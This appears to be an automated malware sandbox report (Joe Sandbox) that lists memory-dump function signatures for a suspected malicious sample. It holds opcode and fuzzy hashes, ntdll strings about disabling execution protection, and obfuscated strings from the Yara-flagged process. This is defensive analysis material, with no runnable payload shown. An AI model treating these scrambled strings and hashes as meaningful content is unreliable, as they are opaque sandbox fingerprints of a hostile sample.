                                                                                  • Opcode ID: 60ed9ade43182fa001fbfa5a5a60bc594ea61892f31e01ce253290c628a76b2c
                                                                                  • Instruction ID: bfd17ffc50d23b40ef5dc54e758cd4915e16bcaf0e6c4707292e8240ed263ba1
                                                                                  • Opcode Fuzzy Hash: 60ed9ade43182fa001fbfa5a5a60bc594ea61892f31e01ce253290c628a76b2c
                                                                                  • Instruction Fuzzy Hash: AA90022921340012E6807158940860A000587D2342F95D426A0019558DCD19896A6325
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ca0c0c934a5d6a32d4e3cf271057f9e0126ba05fe125b58821f586d8a4aeb906
                                                                                  • Instruction ID: 2df95d377a08ca18761eb282f23a2aaac9ee150b0c97b30f24fdb6c72c5db5be
                                                                                  • Opcode Fuzzy Hash: ca0c0c934a5d6a32d4e3cf271057f9e0126ba05fe125b58821f586d8a4aeb906
                                                                                  • Instruction Fuzzy Hash: 7990022120544452E60075589408A06000587D1345F55D022A1068595ECA398952B135
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fb564b6c126e8d6e7efca81c18d443ceeb6f3d1ba55284ca91ef4135bd37f56f
                                                                                  • Instruction ID: 3e2ce80cd8c7b630f5c4aeed8684de5a44f1b5b8d5a420617c06f5c4dc8695b6
                                                                                  • Opcode Fuzzy Hash: fb564b6c126e8d6e7efca81c18d443ceeb6f3d1ba55284ca91ef4135bd37f56f
                                                                                  • Instruction Fuzzy Hash: FA90026120180413E64075588804607000587D1342F55C022A2068555F8E2D8D527139
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 15e234c3248aad44b323831725ae225c62c730846c8405e1fadfa83d0a8662ce
                                                                                  • Instruction ID: 7c5a5826c17cee5d9f014094f61250637754f3a9e7e8ce44df4c683878abf7a3
                                                                                  • Opcode Fuzzy Hash: 15e234c3248aad44b323831725ae225c62c730846c8405e1fadfa83d0a8662ce
                                                                                  • Instruction Fuzzy Hash: 2790027120140412E64071588404746000587D1341F55C022A5068554F8A5D8ED67669
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2df81d31ba4b57fbebe33fdff8b5d28dc3039ef384d472d36b97043aedfb3d7e
                                                                                  • Instruction ID: b555cb2c44a95a6111ef7a98cab6c6b6a9a09b5fc377f030b0696958461dfec5
                                                                                  • Opcode Fuzzy Hash: 2df81d31ba4b57fbebe33fdff8b5d28dc3039ef384d472d36b97043aedfb3d7e
                                                                                  • Instruction Fuzzy Hash: E790022160140512E60171588404616000A87D1381F95C033A1028555FCE298A93B135
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 00fdae2d39a49290eef9a274ce3ef8de74518828e394877d1d9edbdcd6ab5c85
                                                                                  • Instruction ID: 5075023bce4b5d04a12bfa8e2f90e405b7a6ce65f4a76459a575315fa3b6bbb0
                                                                                  • Opcode Fuzzy Hash: 00fdae2d39a49290eef9a274ce3ef8de74518828e394877d1d9edbdcd6ab5c85
                                                                                  • Instruction Fuzzy Hash: 4890022130140412E602715884146060009C7D2385F95C023E1428555E8A298A53B136
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c2de60ec6806fba3d3e61103b8cac5c8354ae45971c2b04565fd989e4d0c4c93
                                                                                  • Instruction ID: 88059bbbfae7fbf73cddfd1dd044be08e56c53d78eff3e7aaa06e891a8ce0645
                                                                                  • Opcode Fuzzy Hash: c2de60ec6806fba3d3e61103b8cac5c8354ae45971c2b04565fd989e4d0c4c93
                                                                                  • Instruction Fuzzy Hash: 71900221211C0052E70075688C14B07000587D1343F55C126A0158554DCD1989626525
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f115d570c867fbc5c69ba4262c23c6371e47e4f189e9b61757f5fdba0bd4a681
                                                                                  • Instruction ID: e5d4127dab1df456a6b95fff064830f30bb821681961fe6f475c335e8089b9ab
                                                                                  • Opcode Fuzzy Hash: f115d570c867fbc5c69ba4262c23c6371e47e4f189e9b61757f5fdba0bd4a681
                                                                                  • Instruction Fuzzy Hash: 339002216014005256407168C8449064005ABE2351755C132A099C550E895D89666669
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f72dd972a728c4ea87925d9e0df63d7f6e0c3bd900dbd27b01bde6961b76f16b
                                                                                  • Instruction ID: 2ff981903f2ef6e93ccb12f699329100900438d7444a9d23d8a44a80a5a714bf
                                                                                  • Opcode Fuzzy Hash: f72dd972a728c4ea87925d9e0df63d7f6e0c3bd900dbd27b01bde6961b76f16b
                                                                                  • Instruction Fuzzy Hash: 2290023120180412E60071588808747000587D1342F55C022A5168555F8A69C9927535
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fc655ec1928d0d55f8520bf0be681f6e2737825165b3a0d441e57c8e004352cb
                                                                                  • Instruction ID: 27be60848499a7bf466cb164f62f2a73ed1d38a9ff9cc843d268372907a83c07
                                                                                  • Opcode Fuzzy Hash: fc655ec1928d0d55f8520bf0be681f6e2737825165b3a0d441e57c8e004352cb
                                                                                  • Instruction Fuzzy Hash: 0390023120180412E6007158881470B000587D1342F55C022A1168555E8A2989527575
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a171304594cf87da5b07a4d1d27886ed6ddfb473589f53c61704211bdda39bf2
                                                                                  • Instruction ID: 12c248dfb51c108a5ecd25000eb3e2424a88cbaa8bd0324696a3155374ca541a
                                                                                  • Opcode Fuzzy Hash: a171304594cf87da5b07a4d1d27886ed6ddfb473589f53c61704211bdda39bf2
                                                                                  • Instruction Fuzzy Hash: D190026121140052E60471588404706004587E2341F55C023A2158554DC92D8D626129
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a4068484046e8d7a948058d9d528f488713d8082b88cbb4d11d9b616d08cfa4a
                                                                                  • Instruction ID: caa31c3c7e4a47a6be6a6778f1f26d67c7269638d9a6bed7cdc96b283a4ac43b
                                                                                  • Opcode Fuzzy Hash: a4068484046e8d7a948058d9d528f488713d8082b88cbb4d11d9b616d08cfa4a
                                                                                  • Instruction Fuzzy Hash: F990026134140452E60071588414B060005C7E2341F55C026E1068554E8A1DCD53712A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e8bd705576467f788708b5e8bc9fc2df0583b14dc9d550ca9fde6a9cb80d98f8
                                                                                  • Instruction ID: 48dca4134c71b0b537e29a92c0ec4bc38ecdab662d20ba628466b1e6d06f6487
                                                                                  • Opcode Fuzzy Hash: e8bd705576467f788708b5e8bc9fc2df0583b14dc9d550ca9fde6a9cb80d98f8
                                                                                  • Instruction Fuzzy Hash: A790022124140812E6407158C4147070006C7D1741F55C022A0028554E8A1A8A6676B5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 908161fa1bf765324de8e115683899944696253cb90061d6fc0dea91f19a63b3
                                                                                  • Instruction ID: 51dd75316d44a9955205afcfb5c991337f2472395dfc4527096e85bb6d2ef05f
                                                                                  • Opcode Fuzzy Hash: 908161fa1bf765324de8e115683899944696253cb90061d6fc0dea91f19a63b3
                                                                                  • Instruction Fuzzy Hash: 7E90022120184452E64072588804B0F410587E2342F95C02AA415A554DCD1989566725
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e58d258b816884e1ca939ac94a3adb0427ca104085f8c42ecbc945b6a33f3885
                                                                                  • Instruction ID: 9a6885a1fd2ea282cb18f897240086c7c2cb01fe6aa4e0ed9eda1b9099cf438e
                                                                                  • Opcode Fuzzy Hash: e58d258b816884e1ca939ac94a3adb0427ca104085f8c42ecbc945b6a33f3885
                                                                                  • Instruction Fuzzy Hash: 5F90022124545112E650715C84046164005A7E1341F55C032A0818594E895989567225
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2bcdc592d71d5028096a0a3a5836443e3b2e11291cd48ac973a6608800e58ea1
                                                                                  • Instruction ID: f0aa336df0f142df63d73ed93eae16addfee2759f4e7c326b08a7efb5cc612ad
                                                                                  • Opcode Fuzzy Hash: 2bcdc592d71d5028096a0a3a5836443e3b2e11291cd48ac973a6608800e58ea1
                                                                                  • Instruction Fuzzy Hash: 1A90023520140412EA1071589804646004687D1341F55D422A0428558E8A5889A2B125
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 907bfdf5efde5e00eb7748f62eed914d6d3c857134f834ad7cf2fb804eb39f27
                                                                                  • Instruction ID: 71aa13fbd463bb3028e2254f75ee3d64b023748735735a0fac6d38e7218a9ffb
                                                                                  • Opcode Fuzzy Hash: 907bfdf5efde5e00eb7748f62eed914d6d3c857134f834ad7cf2fb804eb39f27
                                                                                  • Instruction Fuzzy Hash: D190023120240152AA4072589804A4E410587E2342B95D426A0019554DCD1889626225
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                  • Instruction ID: 5857ab9bb1c272872b311a025d13eebebf94a0675d5f6af1f137923f8e1fe4e3
                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                  • Instruction Fuzzy Hash:
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: 9e5700215f7fb4fbb63c440a8c9d31fb3098d3da0a3e857021f7aa7ee3615dd7
                                                                                  • Instruction ID: 0ac839b9178f735a858f5750f2e5966e4d1e038a1c8872456d4c7d60f48d01a7
                                                                                  • Opcode Fuzzy Hash: 9e5700215f7fb4fbb63c440a8c9d31fb3098d3da0a3e857021f7aa7ee3615dd7
                                                                                  • Instruction Fuzzy Hash: 2751FAB6E00116BFDF60EF9988806BEF7B8BB08310B148169E465D7641D734EF50BBA1
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: 920fd44db904e17dbffd41d53bbb18f03a0b2806031b4319303480ab8c83d573
                                                                                  • Instruction ID: 479c74eda0a18db546384d7eeac1ce12caf0859c7d5b60684302ffd34c1d6e36
                                                                                  • Opcode Fuzzy Hash: 920fd44db904e17dbffd41d53bbb18f03a0b2806031b4319303480ab8c83d573
                                                                                  • Instruction Fuzzy Hash: 2A512671A00649AFCB70DF9CCC9097FB7F8EF44310B088459E695C3692EAB4DE00AB60
                                                                                  Strings
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00FB46FC
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00FB4725
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00FB4742
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00FB4655
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 00FB4787
                                                                                  • ExecuteOptions, xrefs: 00FB46A0
                                                                                  • Execute=1, xrefs: 00FB4713
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  • Opcode ID: a3905a08bd52c5b2535025f44276322e25373d4b3f83391b3b095e1bde6f5ed1
                                                                                  • Instruction ID: a398b8c5c0db74dcad84b0ffc538ea3f47a68c79cdfd9781d5a54e907f524b5e
                                                                                  • Opcode Fuzzy Hash: a3905a08bd52c5b2535025f44276322e25373d4b3f83391b3b095e1bde6f5ed1
                                                                                  • Instruction Fuzzy Hash: DB513A31A143197ADF10BAA4EC86FED73A8EF14310F1440AAE509A7181EB75AE45EF52
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                  • Instruction ID: ebb7a05e70aa8ad21a893501795c1ac68093d707ca2dc0f62ec1fd4371f7f496
                                                                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                  • Instruction Fuzzy Hash: E2022571508341AFD345DF18C890A6BBBE5FFC8700F448A6DF9858B268DB7AE945CB42
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-$0$0
                                                                                  • API String ID: 1302938615-699404926
                                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction ID: d902d8f3d58bdbe80343c5727dbe56f1ce6a32c90d7292c714adb5b3d6087e40
                                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction Fuzzy Hash: AA81E330E052499EDF24EF68C8917FEBBB5AF85330F18425AE861A72D1D7349C41EB50
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3ede5c712596dd4a285a7fbbcdcab6cd00d7e278a3e7e2c11ac77a3fdfc0691d
                                                                                  • Instruction ID: 913b4ecd04f43a4afbce95d0b2f4b54307b8a39908769c9bc597cda7ab05ced0
                                                                                  • Opcode Fuzzy Hash: 3ede5c712596dd4a285a7fbbcdcab6cd00d7e278a3e7e2c11ac77a3fdfc0691d
                                                                                  • Instruction Fuzzy Hash: 92F02B7350421627DB102A6EAC40B86BF9CEB85378F241232FF5897241DA71E8118BA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4e75dd162cd450f326c9c721378bea543130eb237317d2c9f3042ee2795566d9
                                                                                  • Instruction ID: 7c0380a5348db469ee376fcc882efabd8d54880e94e6073c90f6c7a853c96c6b
                                                                                  • Opcode Fuzzy Hash: 4e75dd162cd450f326c9c721378bea543130eb237317d2c9f3042ee2795566d9
                                                                                  • Instruction Fuzzy Hash: 2601DBF2C11218AFCB41DFE8D9409EEBBF9AB08240F14466AD915F3200F7745A048FA5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 53640a4673118af59d00b1ed5a23bda9d24756024376f34d47fbb2a30d0ff4b3
                                                                                  • Instruction ID: 6e96ee49016ff1dec4e6fd9a1f085da484206549eba6dfc7923cd99cb04ee74d
                                                                                  • Opcode Fuzzy Hash: 53640a4673118af59d00b1ed5a23bda9d24756024376f34d47fbb2a30d0ff4b3
                                                                                  • Instruction Fuzzy Hash: 45F08CB6200209BFCB00DF88CC85EEB73ADEF89710F008508BE18A7200C770B8108BB0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 287ad701f9fc09d847462748f2dea7b0dd8b850354188c692eb8819c278418b1
                                                                                  • Instruction ID: df2543163c07ffab73741234beede4ea00593773e4ef4b2b311b59f77cfd644b
                                                                                  • Opcode Fuzzy Hash: 287ad701f9fc09d847462748f2dea7b0dd8b850354188c692eb8819c278418b1
                                                                                  • Instruction Fuzzy Hash: C7E09AB2200209BFDA10EE58DD49EEB37ADEFC9750F108018FA08A7241C770BC108BB4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ca1a6a713b3f01840001392278596669daafcc955991422778cdfdd8a1516e09
                                                                                  • Instruction ID: 348842ca3d3b1e8a6071fb6e484ed70c92d6bd37236429b9a60f692c9c4216c0
                                                                                  • Opcode Fuzzy Hash: ca1a6a713b3f01840001392278596669daafcc955991422778cdfdd8a1516e09
                                                                                  • Instruction Fuzzy Hash: 37F08271C0520CEBDB14DF64D841BDDBBB8EB04360F604369EE24DB280D6349750CB81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9a487808303671b97c9476ea5ed72f36a694bc16127d787400fee9bfe6dc4c83
                                                                                  • Instruction ID: 65347d59640aef43442c530f0286b16148c74e7e6120b7747036ef70808a5035
                                                                                  • Opcode Fuzzy Hash: 9a487808303671b97c9476ea5ed72f36a694bc16127d787400fee9bfe6dc4c83
                                                                                  • Instruction Fuzzy Hash: 76E08632A4061837D62055899C09FBB775DDBC6FA0F054164FF08EB340E6B0AD0447F5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: de216e622a66ebd299a07056680cbab10e1d2a0827ce620d1a7f5e78a6f7c7ce
                                                                                  • Instruction ID: b099d0f3d172619e8b67abbef62811452d3be22b69392911a89bfa15cc674c15
                                                                                  • Opcode Fuzzy Hash: de216e622a66ebd299a07056680cbab10e1d2a0827ce620d1a7f5e78a6f7c7ce
                                                                                  • Instruction Fuzzy Hash: DDE046362102487BD220AA59EC44E9B776DEFC6790F508515FB1DA7241C6B1B9118BE1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7a8b0ee8974525f7f8e5dd19b9d89adb90029ea89ca90e240209c67a680fd51c
                                                                                  • Instruction ID: 2bb2eedd6b1c8ecf92b02cd2de9ba67ca777eb42e1c2685b1b585143e36b8115
                                                                                  • Opcode Fuzzy Hash: 7a8b0ee8974525f7f8e5dd19b9d89adb90029ea89ca90e240209c67a680fd51c
                                                                                  • Instruction Fuzzy Hash: 5FB012C502124AA0190333426E000027F03AEC61B13F10953E285A9252D7A106202206
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (/2,$)/+2$)2,<$*(5<$*2.'$+2-$$+2/*$-$<O$-),$$-)5$.,-*$/)+2$/*<4$0<pu$2,2.$2./)$4Kur$<4/2$<KSK$<RH<$<^uh$O}zy$P0<p$Qsfu$WTHQ$Wuh3$]llp$l}e3$pp}3$rxyn$s5<_$tnsq$tnsq$u3)/$uwy<$wy<_$xsko$xyzy$y3(/$y<.,$yKy~$}z}n
                                                                                  • API String ID: 0-606234297
                                                                                  • Opcode ID: 233256df4e38f34ade6b8b4be724e10585e00c80c8c83108041821a983508e2a
                                                                                  • Instruction ID: 7a48e63b615d73debfc6dd815e1ca9301df07b2dc5f50292e474567751b5fb61
                                                                                  • Opcode Fuzzy Hash: 233256df4e38f34ade6b8b4be724e10585e00c80c8c83108041821a983508e2a
                                                                                  • Instruction Fuzzy Hash: FF41C0B4D0035CDEDB21CF96EA816DDBF70BB06340FA09298D5986F265C7705A82CF59
                                                                                  Strings
                                                                                  Memory Dump Source
